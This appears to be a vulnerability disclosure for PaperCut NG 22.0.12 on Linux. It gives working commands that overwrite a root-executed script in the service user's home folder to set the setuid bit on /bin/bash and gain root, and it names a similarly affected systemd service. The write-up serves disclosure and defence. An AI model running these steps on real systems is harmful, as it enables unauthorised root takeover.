We download the latest version 22.0.12 / Build 66453 from the website (pcng-setup-22.0.12.66454.sh) and install it as a low privileged user called "papercut" on Ubuntu 22.04. On installation we choose "su" method and provide the root password.
Assume we have access to this low privileged "papercut" user as an attacker, for example via ssh or another vulnerability and we can also access the web application on port 9191. We go to http://127.0.0.1:9191/app?service=page/PrintDeploy while logged in as application admin and then follow the assistant on the right side of the screen. We now end up on the "Mobility Print: Import Printers" screen. There we enter anything in the search field and press refresh servers. This will run /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
on the machine as root. As this file is in the directory of the papercut user, we can replace it with any binary or shell script we want.
To execute the attack, run the following commands as the low privileged "papercut" user:
papercut@research:~$ ls -lah /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4,0K Mai 26 13:03 .
drwx------ 3 papercut papercut 4,0K Mai 26 13:03 ..
...
-rwxr-xr-x 1 papercut papercut 493 Mai 12 08:45 server-command
...
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#
. `dirname $0`/.common
export CLASSPATH
${JRE_HOME}/bin/java \
-Djava.io.tmpdir=${TMP_DIR} \
-Dserver.home=${SERVER_HOME} \
-Djava.awt.headless=true \
-Djava.locale.providers=COMPAT,SPI \
-Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
-Xverify:none \
biz.papercut.pcng.server.ServerCommand \
"$@"
papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash
Now the script has been replaced and will set the setuid bit on bash when we hit the refresh button. Note that we can do that because the file is in our home directory and is owned by the papercut user (but executed as root).
Confirm root privileges:
papercut@research:~$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1,4M Jan 6 2022 /bin/bash
papercut@research:~$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)
Besides the example above, there also other similar issues with executing binaries in the papercut home folder as root. For example the print deploy service is running another binary as root from the low privileged users home folder:
papercut@research:~$ cat /etc/systemd/system/multi-user.target.wants/pc-print-deploy.service
[Unit]
Description=Automatically deploys printers through a server configuration
ConditionFileIsExecutable=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target
Here the binary can also be replaced similar to the above - but it requires a restart to trigger it. Other services are also affected.